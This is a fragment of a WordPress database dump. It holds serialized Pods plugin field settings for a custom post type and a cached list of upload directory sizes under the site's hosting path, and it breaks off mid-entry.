1:\"0\";s:17:\"supports_comments\";s:1:\"0\";s:18:\"supports_revisions\";s:1:\"0\";s:24:\"supports_page_attributes\";s:1:\"0\";s:21:\"supports_post_formats\";s:1:\"0\";s:28:\"built_in_taxonomies_category\";s:1:\"0\";s:46:\"built_in_taxonomies_elementor_library_category\";s:1:\"0\";s:42:\"built_in_taxonomies_elementor_library_type\";s:1:\"0\";s:33:\"built_in_taxonomies_link_category\";s:1:\"0\";s:28:\"built_in_taxonomies_post_tag\";s:1:\"0\";s:37:\"built_in_taxonomies_resource_category\";s:1:\"0\";s:32:\"built_in_taxonomies_resource_tag\";s:1:\"0\";s:33:\"built_in_taxonomies_resource_type\";s:1:\"0\";s:12:\"show_in_menu\";s:1:\"1\";s:13:\"menu_position\";s:1:\"0\";s:9:\"menu_icon\";s:15:\"dashicons-money\";s:17:\"show_in_nav_menus\";s:1:\"1\";s:17:\"show_in_admin_bar\";s:1:\"1\";s:11:\"pfat_enable\";s:1:\"0\";s:21:\"pfat_run_outside_loop\";s:1:\"0\";s:11:\"pfat_single\";s:27:\"Document Resources Template\";s:18:\"pfat_append_single\";s:6:\"append\";s:18:\"pfat_filter_single\";s:11:\"the_content\";s:19:\"pfat_append_archive\";s:6:\"append\";s:19:\"pfat_filter_archive\";s:6:\"custom\";s:11:\"rest_enable\";s:1:\"0\";s:8:\"read_all\";s:1:\"0\";s:9:\"write_all\";s:1:\"0\";s:41:\"built_in_taxonomies_institutions_category\";s:1:\"1\";s:26:\"supports_jetpack_publicize\";s:1:\"0\";s:25:\"supports_jetpack_markdown\";s:1:\"0\";s:26:\"pfat_filter_archive_custom\";s:11:\"the_content\";}}s:7:\"recurse\";b:1;s:13:\"object_fields\";a:26:{s:2:\"ID\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:2:\"ID\";s:5:\"label\";s:2:\"ID\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:1:{i:0;s:2:\"id\";}s:20:\"hide_in_default_form\";b:1;}s:10:\"post_title\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:10:\"post_title\";s:5:\"label\";s:5:\"Title\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:2:{s:14:\"display_filter\";s:9:\"the_title\";s:19:\"display_filter_args\";a:1:{i:0;s:7:\"post_ID\";}}s:5:\"alias\";a:2:{i:0;s:5:\"title\";i:1;s:4:\"name\";}}s:12:\"post_content\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:12:\"post_content\";s:5:\"label\";s:7:\"Content\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:7:\"wysiwyg\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:4:{s:25:\"wysiwyg_allowed_html_tags\";s:0:\"\";s:21:\"wysiwyg_media_buttons\";i:1;s:14:\"display_filter\";s:11:\"the_content\";s:8:\"pre_save\";i:0;}s:5:\"alias\";a:1:{i:0;s:7:\"content\";}}s:12:\"post_excerpt\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:12:\"post_excerpt\";s:5:\"label\";s:7:\"Excerpt\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:9:\"paragraph\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:4:{s:20:\"paragraph_allow_html\";i:1;s:27:\"paragraph_allowed_html_tags\";s:0:\"\";s:14:\"display_filter\";s:11:\"the_excerpt\";s:8:\"pre_save\";i:0;}s:5:\"alias\";a:1:{i:0;s:7:\"excerpt\";}}s:11:\"post_author\";a:24:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"post_author\";s:5:\"label\";s:6:\"Author\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:4:{s:16:\"pick_format_type\";s:6:\"single\";s:18:\"pick_format_single\";s:12:\"autocomplete\";s:13:\"default_value\";s:10:\"{@user.ID}\";s:21:\"default_evaluate_tags\";i:1;}s:5:\"alias\";a:1:{i:0;s:6:\"author\";}s:11:\"pick_object\";s:4:\"user\";s:8:\"pick_val\";s:4:\"user\";s:17:\"pick_data_storage\";s:6:\"object\";s:11:\"pick_output\";s:3:\"ids\";}s:9:\"post_date\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"post_date\";s:5:\"label\";s:12:\"Publish Date\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:2:{i:0;s:7:\"created\";i:1;s:4:\"date\";}}s:13:\"post_date_gmt\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"post_date_gmt\";s:5:\"label\";s:18:\"Publish Date (GMT)\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:11:\"post_status\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"post_status\";s:5:\"label\";s:6:\"Status\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";s:5:\"draft\";s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:11:\"pick_object\";s:11:\"post-status\";s:18:\"pick_format_single\";s:8:\"dropdown\";s:5:\"alias\";a:1:{i:0;s:6:\"status\";}}s:14:\"comment_status\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:14:\"comment_status\";s:5:\"label\";s:14:\"Comment Status\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";s:4:\"open\";s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:4:\"data\";a:2:{s:4:\"open\";s:4:\"Open\";s:6:\"closed\";s:6:\"Closed\";}}s:11:\"ping_status\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"ping_status\";s:5:\"label\";s:11:\"Ping Status\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";s:4:\"open\";s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:4:\"data\";a:2:{s:4:\"open\";s:4:\"Open\";s:6:\"closed\";s:6:\"Closed\";}s:20:\"hide_in_default_form\";b:1;}s:13:\"post_password\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"post_password\";s:5:\"label\";s:8:\"Password\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"password\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:20:\"hide_in_default_form\";b:1;}s:9:\"post_name\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"post_name\";s:5:\"label\";s:9:\"Permalink\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"slug\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:2:{i:0;s:4:\"slug\";i:1;s:9:\"permalink\";}}s:7:\"to_ping\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:7:\"to_ping\";s:5:\"label\";s:7:\"To Ping\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:6:\"pinged\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:6:\"pinged\";s:5:\"label\";s:6:\"Pinged\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:13:\"post_modified\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"post_modified\";s:5:\"label\";s:18:\"Last Modified Date\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:8:\"modified\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:17:\"post_modified_gmt\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:17:\"post_modified_gmt\";s:5:\"label\";s:24:\"Last Modified Date (GMT)\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:21:\"post_content_filtered\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:21:\"post_content_filtered\";s:5:\"label\";s:18:\"Content (filtered)\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:9:\"paragraph\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:7:{s:20:\"paragraph_allow_html\";i:1;s:16:\"paragraph_oembed\";i:1;s:21:\"paragraph_wptexturize\";i:1;s:23:\"paragraph_convert_chars\";i:1;s:17:\"paragraph_wpautop\";i:1;s:25:\"paragraph_allow_shortcode\";i:1;s:27:\"paragraph_allowed_html_tags\";s:0:\"\";}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:11:\"post_parent\";a:26:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"post_parent\";s:5:\"label\";s:6:\"Parent\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:11:\"pick_object\";s:9:\"post_type\";s:8:\"pick_val\";s:11:\"__current__\";s:17:\"pick_data_storage\";s:6:\"object\";s:11:\"pick_output\";s:3:\"ids\";s:5:\"alias\";a:1:{i:0;s:6:\"parent\";}s:4:\"data\";a:0:{}s:6:\"hidden\";b:1;}s:4:\"guid\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:4:\"guid\";s:5:\"label\";s:4:\"GUID\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:10:\"menu_order\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:10:\"menu_order\";s:5:\"label\";s:10:\"Menu Order\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:0:{}}s:9:\"post_type\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"post_type\";s:5:\"label\";s:4:\"Type\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:4:\"type\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:14:\"post_mime_type\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:14:\"post_mime_type\";s:5:\"label\";s:9:\"Mime Type\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:13:\"comment_count\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"comment_count\";s:5:\"label\";s:13:\"Comment Count\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:8:\"comments\";a:24:{s:2:\"id\";i:0;s:4:\"name\";s:8:\"comments\";s:5:\"label\";s:8:\"Comments\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:7:\"comment\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:19:\"comment_format_type\";s:5:\"multi\";}s:11:\"pick_object\";s:7:\"comment\";s:8:\"pick_val\";s:7:\"comment\";s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:13:\"_thumbnail_id\";a:23:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"_thumbnail_id\";s:5:\"label\";s:14:\"Featured Image\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"file\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:16:\"file_format_type\";s:6:\"single\";s:9:\"file_type\";s:10:\"images-any\";s:15:\"file_edit_title\";i:0;s:5:\"alias\";a:0:{}}s:21:\"institutions_category\";a:25:{s:2:\"id\";i:0;s:4:\"name\";s:21:\"institutions_category\";s:5:\"label\";s:23:\"Institutions Categories\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"taxonomy\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:20:\"taxonomy_format_type\";s:5:\"multi\";}s:11:\"pick_object\";s:8:\"taxonomy\";s:8:\"pick_val\";s:21:\"institutions_category\";s:15:\"taxonomy_object\";s:8:\"taxonomy\";s:12:\"taxonomy_val\";s:21:\"institutions_category\";s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;}}}','off'),(5302475,'_transient_timeout_dirsize_cache','2086252083','off'),(5302476,'_transient_dirsize_cache','a:105:{s:52:\"/home/ekmslib/public_html/wp-content/uploads/2024/11\";i:0;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2024/05\";i:0;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2024/09\";i:0;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2024/02\";i:0;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2024/08\";i:0;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2024/06\";i:0;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2024/12\";i:0;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2024/10\";i:0;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2024/03\";i:0;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2024/04\";i:0;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2024/07\";i:0;s:49:\"/home/ekmslib/public_html/wp-content/uploads/2024\";i:0;s:74:\"/home/ekmslib/public_html/wp-content/uploads/newsletter/thumbnails/2019/11\";i:31826;s:71:\"/home/ekmslib/public_html/wp-content/uploads/newsletter/thumbnails/2019\";i:31826;s:66:\"/home/ekmslib/public_html/wp-content/uploads/newsletter/thumbnails\";i:31826;s:55:\"/home/ekmslib/public_html/wp-content/uploads/newsletter\";i:31826;s:68:\"/home/ekmslib/public_html/wp-content/uploads/wordpress-popular-posts\";i:110334;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2025/11\";i:953936;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2025/05\";i:18042076;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2025/09\";i:2491037;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2025/01\";i:0;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2025/02\";i:0;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2025/08\";i:14694933;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2025/06\";i:24584043;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2025/12\";i:29410086;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2025/10\";i:19375009;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2025/03\";i:0;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2025/04\";i:0;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2025/07\";i:8134852;s:49:\"/home/ekmslib/public_html/wp-content/uploads/2025\";i:117685972;s:74:\"/home/ekmslib/public_html/wp-content/uploads/wp-file-manager-pro/fm_backup\";i:13;s:64:\"/home/ekmslib/public_html/wp-content/uploads/wp-file-manager-pro\";i:13;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2023/05\";i:1863488;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2023/09\";i:1064533;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2023/01\";i:9095371;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2023/02\";i:2199493;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2023/08\";i:87597;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2023/06\";i:2063829;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2023/03\";i:23445809;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2023/04\";i:801893;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2023/07\";i:0;s:49:\"/home/ekmslib/public_html/wp-content/uploads/2023\";i:40622013;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2019/11\";i:210286398;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2019/12\";i:41849843;s:49:\"/home/ekmslib/public_html/wp-content/uploads/2019\";i:252136241;s:61:\"/home/ekmslib/public_html/wp-content/uploads/wpallimport/temp\";i:0;s:64:\"/home/ekmslib/public_html/wp-content/uploads/wpallimport/history\";i:0;s:62:\"/home/ekmslib/public_html/wp-content/uploads/wpallimport/files\";i:0;s:64:\"/home/ekmslib/public_html/wp-content/uploads/wpallimport/uploads\";i:0;s:61:\"/home/ekmslib/public_html/wp-content/uploads/wpallimport/logs\";i:0;s:56:\"/home/ekmslib/public_html/wp-content/uploads/wpallimport\";i:0;s:52:\"/home/ekmslib/public_html/wp-content/uploads/oceanwp\";i:353312;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2017/08\";i:28301;s:49:\"/home/ekmslib/public_html/wp-content/uploads/2017\";i:28301;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2016/11\";i:990283;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2016/05\";i:2005287;s:49:\"/home/ekmslib/public_html/wp-content/uploads/2016\";i:2995570;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2022/11\";i:0;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2022/05\";i:57751153;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2022/09\";i:74946906;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2022/01\";i:8881873;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2022/02\";i:7631782;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2022/08\";i:42256726;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2022/06\";i:40786327;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2022/12\";i:3564791;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2022/10\";i:4382382;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2022/03\";i:5402124;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2022/04\";i:45704437;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2022/07\";i:7961113;s:49:\"/home/ekmslib/public_html/wp-content/uploads/2022\";i:299269614;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2020/11\";i:14649507;s